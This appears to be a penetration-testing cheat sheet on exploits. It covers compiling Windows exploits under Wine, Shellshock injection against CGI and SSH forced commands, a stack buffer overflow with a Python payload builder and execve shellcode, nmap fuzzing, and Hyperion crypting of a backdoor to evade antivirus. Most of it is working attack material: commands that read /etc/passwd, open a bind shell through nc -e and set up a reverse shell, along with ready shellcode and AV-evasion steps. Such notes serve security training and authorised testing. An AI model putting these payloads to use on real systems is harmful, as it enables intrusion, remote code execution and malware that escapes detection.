15 - Exploits
--------------- Compiling Windows Exploits on Kali ---------------
Install MinGW under Wine, then build the exploit with the Windows gcc. -lwsock32 links the Winsock library that most network exploits need.
# wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
# wine mingw-get-setup.exe
select mingw32-base in the installer
# cd /root/.wine/drive_c/windows
# wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
# cd /root/.wine/drive_c/MinGW/bin
# wine gcc -o ability.exe /tmp/exploit.c -lwsock32
# wine ability.exe
Kali also ships the mingw-w64 cross-compiler (i686-w64-mingw32-gcc, used in the Hyperion section below), which produces the same 32-bit PE natively without Wine. Running the result under Wine only shows that it starts; Wine's DLLs and load addresses differ from a real Windows host, so verify return addresses and behaviour on the target itself.
--------------- Cross Compiling Exploits ---------------
# gcc -m32 -o output32 hello.c (32 bit)
# gcc -m64 -o output hello.c (64 bit)
Match the target's architecture. -m32 on a 64-bit Kali needs the gcc-multilib package, and a binary linked against Kali's current glibc may refuse to run on an older target, so build with -static (or compile on the target) when the libc versions differ.
--------------- Shellshock ---------------
A vulnerable bash (CVE-2014-6271) executes the command that follows a function definition ("() { :;};") in any environment variable it imports. CGI exports request headers as HTTP_* variables, and sshd ForceCommand passes the client's requested command as SSH_ORIGINAL_COMMAND, so both are injection points; a CGI script only triggers if it runs under bash or calls it (system(), popen()).
# git clone https://github.com/nccgroup/shocker
# ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
Shell Shock SSH Forced Command
Check for a forced command by connecting with full debug output and watching what happens after authentication (a session that runs something you did not ask for, or drops you immediately)
# ssh -vvv -i noob noob@$ip
If the user's login shell is a vulnerable bash, the function definition in the requested command is parsed from SSH_ORIGINAL_COMMAND and the trailing command runs instead of the forced one
# ssh -i noob noob@$ip '() { :;}; /bin/bash'
Shell Shock view file contents (the injected command's output is written before the CGI script's own headers, so read the raw response even when the status is 500)
# echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock run bind shell (requires a netcat with -e on the target; then connect to port 9999 on TARGET)
# echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock reverse shell: start the listener first, then inject a reverse-shell command through the same User-Agent header, pointed at the listener's address and port 443
# nc -l -p 443
--------------- Buffer Overflow Exploits ---------------
Pass 1000 A's as a parameter and confirm the crash (EIP overwritten with 0x41414141)
# ./r00t $(python -c 'print "A" * 1000')
Create a cyclic pattern in which every 4-byte window is unique, so the value that lands in EIP identifies its position (in current Metasploit the scripts live under tools/exploit/ and take -l for the length and -q for the query value)
# cd /usr/share/metasploit-framework/tools
# ruby pattern_create.rb 1000
Determine the pattern offset from the EIP value at the crash (0x6a413969 is the little-endian dword "i9Aj", which sits at offset 268 in the pattern)
# ruby pattern_offset.rb 0x6a413969
Pass the shell with the offset value: 268 bytes of filler, the return address (little-endian, pointing into the NOP sled on the stack), 16 NOPs and a 23-byte execve("/bin//sh") shellcode. env - clears the environment so the stack addresses observed in the debugger stay valid. The address 0xbffffc80 belongs to a 32-bit target without ASLR and must be taken from your own debugger session. The one-liner is Python 2 (print of a str); under Python 3 write the bytes with sys.stdout.buffer.write. $(...) cannot pass NUL bytes, so address and shellcode must be NUL-free.
# env - ./r00t $(python -c 'print "A"*268 + "\x80\xfc\xff\xbf" + "\x90"*16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')
# id
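The pattern and payload steps above, as an added example in Python (not code from the original notes, the Metasploit tools or the techorganic post). It reimplements the cyclic pattern and offset lookup the two Ruby scripts perform, then assembles the page's payload (268 filler bytes, little-endian return address, NOP sled, the page's 23-byte shellcode) and checks it for bad characters before writing raw bytes for $(...). DEMO_OFFSET and DEMO_RET are placeholders taken from the page's example; real values come from your own crash, and the r00t binary is the page's, not supplied here.

```python
import string
import struct
import sys

# execve("/bin//sh") shellcode from the page's one-liner (23 bytes, no NUL).
SHELLCODE = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)

# Placeholder values from the page's example; take yours from the debugger.
DEMO_OFFSET = 268
DEMO_RET = 0xBFFFFC80


def pattern_create(length):
    """Metasploit-style cyclic pattern: Aa0Aa1Aa2...Ab0... up to `length` chars.

    Each triple is (upper, lower, digit), so every 4-byte window is unique
    within the first 26*26*10*3 = 20280 bytes.  Longer requests are cut at
    that point, because beyond it the pattern repeats and offsets become
    ambiguous.
    """
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)


def pattern_offset(value, length=20280):
    """Offset of a crash value inside pattern_create(length), or -1.

    `value` is the EIP dword as the debugger shows it (int or '0x...' str),
    which x86 stores little-endian, or the four ASCII characters themselves.
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value)
    elif value.lower().startswith("0x"):
        needle = struct.pack("<I", int(value, 16))
    else:
        needle = value.encode()
    return pattern_create(length).encode().find(needle)


def build_payload(offset, ret_addr, shellcode=SHELLCODE, nop_sled=16, filler=b"A"):
    """filler * offset | return address (little-endian) | NOP sled | shellcode.

    ret_addr must land inside the NOP sled on the stack so execution slides
    into the shellcode; the sled absorbs small differences in stack layout.
    """
    return filler * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_sled + shellcode


def bad_chars(payload, bad=(0x00,)):
    """Forbidden bytes present in payload, sorted.

    NUL ends strcpy()-style copies and cannot travel through argv or $(...)
    at all, so it is always bad here; add 0x0a/0x0d or others when the
    input reaches the target over a line-based protocol.
    """
    return sorted(b for b in set(payload) if b in bad)


if __name__ == "__main__":
    # Usage: env - ./r00t "$(python3 bof.py)"   (hypothetical file name)
    # Raw bytes are written, not a str, so this also works under Python 3.
    payload = build_payload(DEMO_OFFSET, DEMO_RET)
    if bad_chars(payload):
        sys.exit("payload contains bad chars: %r" % bad_chars(payload))
    sys.stdout.buffer.write(payload)
```

pattern_offset(0x6a413969) returns 268, the same number the page uses as filler length, which is the check that the offset was read correctly: the crash dword, reversed to "i9Aj", must be found at exactly one position in the pattern.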
From Fuzzing to Zero Day
https://blog.techorganic.com/2014/05/14/from-fuzzing-to-0-day/
--------------- NMAP FUZZING ---------------
Nmap fuzzer list
https://nmap.org/nsedoc/categories/fuzzer.html
Nmap HTTP form fuzzer (finds the forms on the listed paths and submits long and malformed field values; watch the target for errors or crashes, since the script only reports what the server returned)
# nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip
Nmap DNS fuzzer (sends malformed DNS queries until the time limit; -d enables debug output so progress and the offending packets are visible)
# nmap --script dns-fuzz --script-args timelimit=2h $ip -d
--------------- Bypassing Antivirus Software ---------------
Crypting known malware with software protectors. Hyperion is an open source runtime crypter: it AES-encrypts the PE and prepends a stub that recovers the (deliberately short) key by brute force at run time, so the file on disk shares no bytes with the original. The stub is public, so signatures for Hyperion's own output exist; always test the crypted file against the target's AV product before relying on it.
# cp /usr/share/windows-binaries/Hyperion-1.0.zip .
# unzip Hyperion-1.0.zip
# cd Hyperion-1.0/
# i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
hyperion.exe is dynamically linked against MinGW's runtime DLLs, so copy them next to it (the version directory, 5.3-win32 here, depends on the installed gcc; check ls /usr/lib/gcc/i686-w64-mingw32/)
# cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
# cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
# wine hyperion.exe ../backdoor.exe ../crypted.exe